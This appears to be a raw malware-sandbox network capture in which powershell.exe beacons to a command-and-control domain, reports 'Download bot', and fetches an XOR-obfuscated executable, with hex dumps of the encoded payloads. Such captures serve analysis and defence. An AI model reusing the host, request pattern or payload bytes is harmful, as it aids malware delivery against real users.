                                                                                    2024-11-08 10:29:44 UTC311INData Raw: 25 72 6f 75 68 77 6c 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 57 6b 43 56 54 6d 47 55 50 56 6d 52 56 44 71 34 58 6b 4f 4b 5b 31 71 46 4e 49 57 52 56 46 69 70 56 6d 69 42 4c 46 47 59 4e 59 57 4c 60 7b 47 72 58 7b 4f 4e 60 47 6e 78 57 56 6d 51 64 6f 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 5b 6d 44 76 52 31 6d 45 50 56 65 4b 52 45 43 4e 50 33 6d 43 5b 31 6d 45 50 54 34 45 63 6b 43 4e 50 33 62 76 52 30 71 74 57 6f 57 5b 4c 30 4b 76 58 6b 48 31 5b 30 5b 56 56 6d 47 53 63 44 5b 50 57 6b 43 56 54 6d 47 55 50 6b 65 44 54 56 38 6f 52 54 4f 43 5b 33 4f 49 53 6f 6d
                                                                                    Data Ascii: %rouhwl<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#WkCVTmGUPVmRVDq4XkOK[1qFNIWRVFipVmiBLFGYNYWL`{GrX{ON`GnxWVmQdoONP3mC[1mEPVeKP1Go[mDvR1mEPVeKRECNP3mC[1mEPT4EckCNP3bvR0qtWoW[L0KvXkH1[0[VVmGScD[PWkCVTmGUPkeDTV8oRTOC[3OISom
                                                                                    2024-11-08 10:29:44 UTC1369INData Raw: 43 60 6a 6d 47 55 6f 5b 68 63 6d 71 72 58 33 34 53 5b 30 6d 75 4e 56 75 6d 54 31 48 76 58 6f 6d 42 64 6c 53 48 52 6f 43 68 63 56 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 75 6b 4c 30 4b 34 58 57 62 30 63 6d 47 75 4e 56 75 6d 54 31 44 34 52 54 5b 31 64 6c 53 48 52 6f 43 68 63 56 53 6a 52 31 4f 52 62 33 48 78 5b 44 34 6b 4c 6c 4f 6f 5b 6a 4f 42 53 46 48 78 4f 55 4b 60 56 44 6e 76 57 6a 62 35 65 47 4f 74 55 6f 5b 68 60 56 72 32 53 47 47 77 5b 31 6d 45 50 56 65 6a 4c 31 71 76 5b 44 65 57 65 46 47 49 4e 59 71 6a 50 31 47 73 58 7b 4f 52 64 56 47 59 4f 56 34 53 63 55 6d 73 5b 57 53 7b 55 6a 4f 71 50 56 65 4b 50 31 47 73 56 6b 4b 35 65 6d 6d 75 53 6f 4f 51 60 31 5b 56 57 6c 72 34 53 6d 65 56 53 6c 47 54 57 6c 38 6f 52 32 6e 76 5b 31 71 48 55 6b 43 6b 63 56 79 30 56 6b
                                                                                    Data Ascii: C`jmGUo[hcmqrX34S[0muNVumT1HvXomBdlSHRoChcVONP3mC[1mEPVukL0K4XWb0cmGuNVumT1D4RT[1dlSHRoChcVSjR1ORb3Hx[D4kLlOo[jOBSFHxOUK`VDnvWjb5eGOtUo[h`Vr2SGGw[1mEPVejL1qv[DeWeFGINYqjP1GsX{ORdVGYOV4ScUms[WS{UjOqPVeKP1GsVkK5emmuSoOQ`1[VWlr4SmeVSlGTWl8oR2nv[1qHUkCkcVy0Vk
                                                                                    2024-11-08 10:29:44 UTC1369INData Raw: 63 56 79 7b 56 6d 4f 43 65 47 4b 75 4e 59 6d 5b 4c 6d 57 6f 5b 6a 4f 42 54 46 53 58 54 59 53 54 63 6d 5b 7b 58 6a 44 76 52 31 53 53 63 33 65 4b 50 31 47 6f 52 59 6d 42 54 46 53 58 54 6f 65 6a 56 47 47 6f 5b 44 65 6e 63 44 6d 49 56 6f 43 68 53 30 57 6f 58 31 65 46 4c 46 47 43 4c 44 75 4b 50 31 47 6f 52 54 5b 56 57 30 57 47 52 6d 4b 54 4c 56 53 46 57 57 57 47 5b 31 6d 73 57 6f 53 6b 52 47 48 30 52 54 65 60 62 46 4b 49 57 56 65 5b 4c 31 71 72 56 57 69 52 63 47 71 45 50 6c 69 6a 53 46 38 6f 52 6a 65 60 62 46 4b 49 57 6d 47 5b 56 47 4b 77 52 56 62 76 52 31 53 53 63 33 65 4b 50 31 47 6f 52 59 6d 42 54 30 71 58 54 6b 47 6b 63 55 53 6f 5b 44 65 6e 63 44 6d 49 56 6f 43 68 53 30 57 6f 58 31 65 46 4c 46 47 43 4c 44 75 4b 50 31 47 6f 52 54 69 4a 63 46 53 48 57 6f 6d
                                                                                    Data Ascii: cVy{VmOCeGKuNYm[LmWo[jOBTFSXTYSTcm[{XjDvR1SSc3eKP1GoRYmBTFSXToejVGGo[DencDmIVoChS0WoX1eFLFGCLDuKP1GoRT[VW0WGRmKTLVSFWWWG[1msWoSkRGH0RTe`bFKIWVe[L1qrVWiRcGqEPlijSF8oRje`bFKIWmG[VGKwRVbvR1SSc3eKP1GoRYmBT0qXTkGkcUSo[DencDmIVoChS0WoX1eFLFGCLDuKP1GoRTiJcFSHWom
                                                                                    2024-11-08 10:29:44 UTC1369INData Raw: 33 4c 78 57 6f 43 60 60 54 47 77 52 6a 62 34 4c 46 47 49 57 6f 6d 53 57 7b 54 76 58 57 69 60 62 46 4f 74 57 6f 71 4b 50 7b 47 30 56 6d 4f 43 60 33 4b 74 57 6f 4f 68 50 33 75 6f 5b 59 62 76 52 31 6d 45 50 56 65 4b 50 55 43 4d 5b 6d 4f 42 63 46 4b 48 55 6c 79 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 75 69 56 44 34 55 5b 47 62 30 65 56 47 59 4f 56 34 4b 53 45 43 6f 52 6a 69 52 64 56 53 59 57 55 65 44 54 59 40 34 53 47 47 77 5b 31 53 53 62 49 43 60 60 56 65 73 58 57 69 4e 54 33 53 59 4f 59 57 69 57 7b 57 74 52 54 4c 79 63 46 4f 55 50 56 75 60 63 54 5b 7b 58 7b 4b 57 62 44 6d 48 62 31 34 45 60 54 47 6f 52 54 4f 42 57 6d 5b 72 50 6a 4f 57 57 55 6d 58 54 6d 5b 46 50 6a 6d 45 52 6a 38 68 4c 30 47 6f 57 56 34 56 65 56 4b 75 63 49 57 60 64 54 4b 4a 58 6c 6d 42
                                                                                    Data Ascii: 3LxWoC``TGwRjb4LFGIWomSW{TvXWi`bFOtWoqKP{G0VmOC`3KtWoOhP3uo[YbvR1mEPVeKPUCM[mOBcFKHUlyKRIONP3mC[1mEPVuiVD4U[Gb0eVGYOV4KSECoRjiRdVSYWUeDTY@4SGGw[1SSbIC``VesXWiNT3SYOYWiW{WtRTLycFOUPVu`cT[{X{KWbDmHb14E`TGoRTOBWm[rPjOWWUmXTm[FPjmERj8hL0GoWV4VeVKucIW`dTKJXlmB
                                                                                    2024-11-08 10:29:44 UTC517INData Raw: 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 59 4c 54 35 30 58 7b 4f 52 63 46 4b 55 4f 54 71 54 64 55 57 49 58 57 65 35 63 47 69 54 63 7b 5b 56 4c 31 71 76 5b 44 65 56 50 6c 4b 49 64 44 4f 6d 56 47 4b 72 58 32 6d 6f 60 30 50 7b 57 6b 43 6b 52 47 58 76 54 6c 30 72 62 30 71 56 50 6c 69 6a 53 33 65 7b 52 54 4f 52 63 56 47 59 64 46 79 53 63 6c 76 76 56 6d 69 4f 62 44 53 53 63 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 56 57 6d 71 53 54 56 79 46 54 47 58 76 57 6d 4b 53 54 31 47 71 57 6a 65 6e 63 44 6d 49 56 6f 43 68 53 30 57 6f 52 6a 57 72 65 56 4f 48 57 6b 43 52 63 56 79 7b 56 6d 5b 42 60 46 53 49 5b 33 65 6a 4c 6a 5b 37 52 54 69 42 64 56 48 78 55 6c 79 6b 4c 31 34 72 56 6a 4f 42 60 46 4b 75 54 56 65 6b 4c 6a 58 78 56 6d 65 53 5b 30 6d 58 55 56 65 4a 53
                                                                                    Data Ascii: GoRTOC[1mEPVeYLT50X{ORcFKUOTqTdUWIXWe5cGiTc{[VL1qv[DeVPlKIdDOmVGKrX2mo`0P{WkCkRGXvTl0rb0qVPlijS3e{RTORcVGYdFySclvvVmiObDSSc14E`TGoRTOC[1mEPVeVWmqSTVyFTGXvWmKST1GqWjencDmIVoChS0WoRjWreVOHWkCRcVy{Vm[B`FSI[3ejLj[7RTiBdVHxUlykL14rVjOB`FKuTVekLjXxVmeS[0mXUVeJS
                                                                                    2024-11-08 10:29:44 UTC1369INData Raw: 52 63 57 6d 59 64 49 71 60 54 55 43 4d 52 54 4f 43 5b 31 6d 48 4c 44 34 45 63 6b 43 4e 50 33 62 76 52 31 53 53 62 46 30 6a 57 7b 57 70 5b 44 65 72 65 6c 4b 71 50 6a 57 68 4c 33 53 30 58 6a 62 34 60 47 71 45 4c 54 65 69 57 32 69 72 57 6b 4b 72 4c 46 47 46 52 6c 79 6a 52 44 6e 30 52 54 69 7b 55 6a 4f 71 50 56 65 4b 50 31 4b 32 56 57 69 4a 60 46 4b 55 50 56 38 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 53 6f 53 37 5b 44 69 4a 62 46 4b 75 5b 46 53 4a 52 47 5b 34 58 6a 4f 32 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 30 62 7b 55 6b 43 6b 63 56 79 30 56 6b 44 76 60 30 71 49 57 6f 71 6a 53 33 79 30 56 57 69 52 62 46 48 78 4f 49 4f 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 53 6f 53 76 58 6c 34 52 5b 44 71 49 4c 56 69 6d 53 6a 71 72 5b 44
                                                                                    Data Ascii: RcWmYdIq`TUCMRTOC[1mHLD4EckCNP3bvR1SSbF0jW{Wp[DerelKqPjWhL3S0Xjb4`GqELTeiW2irWkKrLFGFRlyjRDn0RTi{UjOqPVeKP1K2VWiJ`FKUPV8DTV8oRTOC[1mEPVeKSoS7[DiJbFKu[FSJRG[4XjO2UjOqPVeKP1GoRTOC[0b{UkCkcVy0VkDv`0qIWoqjS3y0VWiRbFHxOIODTV8oRTOC[1mEPVeKSoSvXl4R[DqILVimSjqr[D
                                                                                    2024-11-08 10:29:44 UTC1369INData Raw: 63 6d 5b 72 55 32 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 66 76 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 52 45 43 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 55 56 65 55 57 7b 54 78 58 6b 4b 31 63 44 79 56 5b 46 79 5b 63 44 71 72 58 30 69 56 63 46 4c 7b 54 56 65 6a 53 7b 69 6f 56 6a 62 34 4c 33 4b 75 64 49 5b 5b 57 30 47 6f 5b 44 65 6e 63 44 6d 49 56 6f 43 68 53 30 57 4e 50 33 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 55 57 7b 54 78 58 6b 4b 31 63 44 79 56 5b 46 79 5b 63 44 71 72 58 30 69 56 63 46 4c 7b 54 56 65
                                                                                    Data Ascii: cm[rU2bvR1mEPVeKP1GoRTOC[1mEPVeKP1GoRTfvUjOqPVeKP1GoRTOC[1mEPVeKP1GoRTOCUjOqPVeKP1GoRTOC[1mEPVeKRECNP3mC[1mEPVeKP1GoRTOC[1mEUVeUW{TxXkK1cDyV[Fy[cDqrX0iVcFL{TVejS{ioVjb4L3KudI[[W0Go[DencDmIVoChS0WNP3bvR1mEPVeKP1GoRTOC[1mEPVeUW{TxXkK1cDyV[Fy[cDqrX0iVcFL{TVe
                                                                                    2024-11-08 10:29:44 UTC1369INData Raw: 30 5b 56 56 6d 47 53 63 44 5b 50 57 6b 43 56 54 6d 47 55 50 56 6d 55 57 7b 54 76 56 6d 69 4a 65 57 71 58 54 56 65 60 56 44 71 34 58 6b 4f 4b 4f 6a 6d 45 54 56 38 4a 53 6b 69 30 54 6d 69 6e 60 6d 71 58 50 6b 43 69 57 7b 6d 30 55 46 72 79 63 46 4c 7b 55 6c 69 60 4c 6d 57 76 52 56 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 4e 54 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 49 55 6c 69 6a 53 31 34 77 52 54 69 7b 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 30 6f 54 31 65 46 65 57 71 49 64 46 79 4b 53 7b 6a 76 58 54 65 56 64 54 6d 49 57 6f 6d 6b 63 55 6d 34 58 32 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 56 57 6d 71 53 54 56 79 46 54 47 58 76 57 6d 4b 53 54 31 47 71 54 6d 69 4a
                                                                                    Data Ascii: 0[VVmGScD[PWkCVTmGUPVmUW{TvVmiJeWqXTVe`VDq4XkOKOjmETV8JSki0Tmin`mqXPkCiW{m0UFrycFL{Uli`LmWvRVbvR1mEPVeKP1GoRTOBNTSSc3eKP1GoRTOC[1mIUlijS14wRTi{UjOqPVeKP1GoRTOC[1mEPVeKP10oT1eFeWqIdFyKS{jvXTeVdTmIWomkcUm4X2bvR1mEPVeKP1GoRTOC[1mEPVeVWmqSTVyFTGXvWmKST1GqTmiJ
                                                                                    2024-11-08 10:29:44 UTC1369INData Raw: 76 76 58 54 5b 4a 63 46 53 48 52 6b 57 4b 50 7b 44 79 58 33 30 32 5b 31 6d 75 60 45 43 6a 52 44 4b 37 55 33 6a 35 65 6c 53 58 63 45 43 4f 57 7b 50 31 56 6a 65 56 60 31 38 59 56 6c 6d 4f 64 6c 65 32 55 46 30 4e 65 6c 4b 55 4e 56 30 69 57 32 69 72 55 56 6a 35 64 6a 30 49 52 6c 6d 4e 53 46 75 34 56 6d 65 4f 4f 44 34 37 5b 7b 57 51 57 31 57 34 56 56 71 52 60 44 38 49 56 6c 69 4e 57 31 31 30 56 6d 65 56 63 47 6d 37 54 55 4b 51 57 31 71 73 56 6c 71 47 64 6a 30 37 53 6c 79 4f 57 44 34 72 55 6f 71 4f 64 6d 6d 75 56 59 6d 4f 57 31 31 78 55 56 71 42 63 54 30 49 52 6c 6d 4f 64 6a 4b 6e 56 57 65 4f 64 44 34 54 54 55 53 5b 64 6c 4c 31 56 6d 65 4f 4f 54 30 44 57 55 47 5b 57 44 47 35 56 56 30 5b 4c 44 38 54 57 6c 71 4e 57 47 6a 76 55 30 53 6f 4f 54 34 54 57 6c 30 4e 57
                                                                                    Data Ascii: vvXT[JcFSHRkWKP{DyX302[1mu`ECjRDK7U3j5elSXcECOW{P1VjeV`18YVlmOdle2UF0NelKUNV0iW2irUVj5dj0IRlmNSFu4VmeOOD47[{WQW1W4VVqR`D8IVliNW110VmeVcGm7TUKQW1qsVlqGdj07SlyOWD4rUoqOdmmuVYmOW11xUVqBcT0IRlmOdjKnVWeOdD4TTUS[dlL1VmeOOT0DWUG[WDG5VV0[LD8TWlqNWGjvU0SoOT4TWl0NW
                                                                                    2024-11-08 10:29:44 UTC1369INData Raw: 48 50 6f 6d 69 57 7b 57 70 58 57 69 42 60 46 4b 45 50 59 53 56 52 44 71 76 56 6b 4b 6a 63 46 4f 71 50 56 75 6a 52 44 71 76 56 6b 4b 6a 63 46 4f 71 50 59 53 57 4c 6d 58 76 5b 44 65 72 65 57 6e 7b 55 56 65 4a 52 44 34 72 5b 44 69 52 62 46 4b 75 5b 49 71 4b 50 7b 47 57 56 57 69 4e 62 6d 53 75 53 6f 53 60 54 31 47 71 5b 56 79 4e 63 46 4f 74 56 6f 43 5b 4c 6d 5b 70 56 57 65 31 65 6c 47 54 53 59 65 4b 60 54 47 31 54 6a 65 56 64 6d 6a 7b 52 6f 43 6b 52 47 4b 76 58 6b 48 31 5b 31 6d 72 5b 49 43 68 63 57 4b 33 5b 45 4f 4f 5b 33 47 49 57 6f 4f 6b 53 30 5b 34 52 56 71 7b 55 6a 4f 72 57 6d 65 57 53 54 71 52 57 45 47 6a 53 6d 57 57 53 56 65 4b 63 6a 6e 79 58 6c 6d 42 4c 47 6d 58 55 6f 4b 4b 60 6f 4f 4e 50 33 79 4e 4c 47 6d 58 52 6b 43 4c 57 6a 34 70 58 54 65 56 60 33
                                                                                    Data Ascii: HPomiW{WpXWiB`FKEPYSVRDqvVkKjcFOqPVujRDqvVkKjcFOqPYSWLmXv[DereWn{UVeJRD4r[DiRbFKu[IqKP{GWVWiNbmSuSoS`T1Gq[VyNcFOtVoC[Lm[pVWe1elGTSYeK`TG1TjeVdmj{RoCkRGKvXkH1[1mr[IChcWK3[EOO[3GIWoOkS0[4RVq{UjOrWmeWSTqRWEGjSmWWSVeKcjnyXlmBLGmXUoKK`oONP3yNLGmXRkCLWj4pXTeV`3


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.11.3049779104.21.86.2194435056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-08 10:29:45 UTC290OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118eae6d565cd3eb81d1af68992a4aa54ba HTTP/1.1
                                                                                    Content-Type: application/json
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                    Host: uyt1n8ded9fb380.com
                                                                                    Content-Length: 140
                                                                                    2024-11-08 10:29:45 UTC140OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 6e 69 6e 67 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 45 6d 70 74 79 20 66 69 6c 65 20 63 72 65 61 74 65 64 20 61 74 3a 20 43 3a 5c 5c 5c 5c 55 73 65 72 73 5c 5c 5c 5c 44 79 6c 61 6e 65 5c 5c 5c 5c 41 70 70 44 61 74 61 5c 5c 5c 5c 4c 6f 63 61 6c 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 65 6d 70 74 79 2e 74 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                    Data Ascii: [ "\"running\"", "\"Empty file created at: C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\empty.txt\"", "----------"]
                                                                                    2024-11-08 10:29:45 UTC953INHTTP/1.1 200 OK
                                                                                    Date: Fri, 08 Nov 2024 10:29:45 GMT
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3UkGjzqatprBI%2BV9LZhJ20AMjTywEOqX28RzEyhgtALC%2FEyTSf%2Fuco%2Fbj6MWFq6eBixQjq%2BWz6U7WJ6JyyEDWxqBbncRki%2BcuoAl80fLW1lMhYCemEd%2Fmpu3A7PQzEh3n0u2nRA%2F0iyK"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=19367&sent=9538&recv=4738&lost=0&retrans=0&sent_bytes=13395074&recv_bytes=22073&delivery_rate=59935424&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8df4e23dfa9142fe-EWR
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=102175&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1090&delivery_rate=37442&cwnd=252&unsent_bytes=0&cid=aa46942944c918ee&ts=849&x=0"


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.11.3049782104.21.86.2194435056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-08 10:29:57 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118eae6d565cd3eb81d1af68992a4aa54ba HTTP/1.1
                                                                                    Content-Type: application/json
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                    Host: uyt1n8ded9fb380.com
                                                                                    Content-Length: 69
                                                                                    2024-11-08 10:29:57 UTC69OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 53 6c 65 65 70 20 31 30 73 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 62 6f 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                    Data Ascii: [ "\"Sleep 10s\"", "\"Download bot\"", "----------"]
                                                                                    2024-11-08 10:29:58 UTC945INHTTP/1.1 200 OK
                                                                                    Date: Fri, 08 Nov 2024 10:29:58 GMT
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5yGcD4U8VK%2BxeNGA%2Bcsmdt1C5ZTebn6SUnYaNMMJmohplrzZj4fF8I%2BNVqsHuoPyhLtgl9AZDDR92%2FTKSEc8chcteGTdespyS83aGl3SARSUder3xjC7VIbX02p4GzIWn%2Bl1unffbZhZ"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2957&sent=4574&recv=2475&lost=0&retrans=2&sent_bytes=6277418&recv_bytes=35591&delivery_rate=59303675&cwnd=268&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8df4e28c2e9a1770-EWR
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=102183&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1018&delivery_rate=37403&cwnd=251&unsent_bytes=0&cid=98dd695392521bee&ts=853&x=0"


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.11.3049783104.21.86.2194435056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-08 10:29:58 UTC338OUTGET /file2/30bb492ec87899a2b4a8fa5c9eeec469bdf1331e13e733bf21c620f0bb30aac1548c78ec9055a01bf495c56498955f53f6c825ee68079bbe4ffef478e9254d76abc75433b29236d6d4ad3a1ad4ad48435e9f0cbebbc164349fd84634f30e15af HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                    Host: uyt1n8ded9fb380.com
                                                                                    2024-11-08 10:29:59 UTC1052INHTTP/1.1 200 OK
                                                                                    Date: Fri, 08 Nov 2024 10:29:59 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 8351232
                                                                                    Connection: close
                                                                                    content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dDlCWN58TGLjW2l784VHsWiObGxllNd2bQNXPfzU7JuP4kXl3eXgK5PmGk6q5tavXgxNlp36ZWJKrUO9t7mdu9N8yEHUbz5msfwHwCyHzTITCepJMdfGvFybL5qFx7%2Bc%2B2mzVSyeN8kl"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=31436&sent=98&recv=88&lost=0&retrans=0&sent_bytes=41049&recv_bytes=38142&delivery_rate=11042016&cwnd=256&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8df4e2933b73207e-IAD
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=109103&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=976&delivery_rate=34575&cwnd=206&unsent_bytes=0&cid=a08d859a2c0b83dd&ts=865&x=0"
                                                                                    2024-11-08 10:29:59 UTC317INData Raw: 4c 5b 91 01 02 01 01 01 05 01 01 01 fe fe 01 01 b9 01 01 01 01 01 01 01 41 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 e9 01 01 01 0f 1e bb 0f 01 b5 08 cc 20 b9 00 4d cc 20 55 69 68 72 21 71 73 6e 66 73 60 6c 21 62 60 6f 6f 6e 75 21 63 64 21 73 74 6f 21 68 6f 21 45 4e 52 21 6c 6e 65 64 2f 0c 0c 0b 25 01 01 01 01 01 01 01 ac bf 76 f8 e8 de 18 ab e8 de 18 ab e8 de 18 ab e1 a6 8b ab e6 de 18 ab 98 5f 19 aa fb de 18 ab e8 de 19 ab 98 df 18 ab f8 5a 1b aa fa de 18 ab f8 5a 1c aa d1 de 18 ab e8 de 18 ab e9 de 18 ab f8 5a 1d aa 9e de 18 ab a0 5b 18 aa e9 de 18 ab a0 5b 1a aa e9 de 18 ab 53 68 62 69 e8 de 18 ab 01 01 01 01 01 01 01 01 51 44 01 01 65 87 09 01 02 d3 0c 66 01 01 01 01 01 01 01 01 f1 01 23
                                                                                    Data Ascii: L[A M Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/%v_ZZZ[[ShbiQDef#
                                                                                    2024-11-08 10:29:59 UTC1369INData Raw: 05 01 01 01 01 01 01 02 01 61 80 01 01 11 01 01 01 01 01 01 11 01 01 01 01 01 01 01 01 11 01 01 01 01 01 01 11 01 01 01 01 01 01 01 01 01 01 11 01 01 01 11 29 90 01 59 01 01 01 69 29 90 01 55 00 01 01 01 41 99 01 8b 04 01 01 01 71 92 01 45 ce 05 01 01 01 01 01 01 01 01 01 01 51 99 01 cd 11 01 01 31 8f 87 01 1d 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 91 87 01 29 01 01 01 f1 8d 87 01 41 00 01 01 01 01 01 01 01 01 01 01 01 11 5e 01 01 0a 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 2f 75 64 79 75 01 01 01 79 26 0d 01 01 11 01 01 01 29 0d 01 01 05 01 01 01 01 01 01 01 01 01 01 01 01 01 01 21 01 01 61 2f 6c 60 6f 60 66 64 65 09 ab 3a 01 01 41 0d 01 01 ad 3a 01 01 2d 0d 01 01 01 01 01 01 01 01 01 01 01 01 01
                                                                                    Data Ascii: a)Yi)UAqEQ1)A^/udyuy&)!a/l`o`fde:A:-
                                                                                    2024-11-08 10:29:59 UTC1369INData Raw: e8 84 d5 25 01 49 8c 04 07 d6 4f 01 49 8c 0c f6 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 69 d5 25 01 49 8c 04 20 d6 4f 01 49 8c 0c 13 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 4a d5 25 01 49 8c 04 1d d6 4f 01 49 8c 0c 0c d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 2f d5 25 01 49 8c 04 26 d6 4f 01 49 8c 0c 19 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 10 d5 25 01 49 8c 04 8b d6 4f 01 49 8c 0c 7a d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f5 d2 25 01 49 8c 04 9c d6 4f 01 49 8c 0c 8f d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 d6 d2 25 01 49 8c 04 a9 d6 4f 01 49 8c 0c 98 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 bb d2 25 01 49 8c 04 da d6 4f 01 49 8c 0c cd d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 9c d2 25 01 49 8c 04 df d6 4f 01 49 8c 0c ce d6 4f 01 49 82 38 01
                                                                                    Data Ascii: %IOIOI8tIi%I OIOI8tIJ%IOIOI8tI/%I&OIOI8tI%IOIzOI8tI%IOIOI8tI%IOIOI8tI%IOIOI8tI%IOIOI8
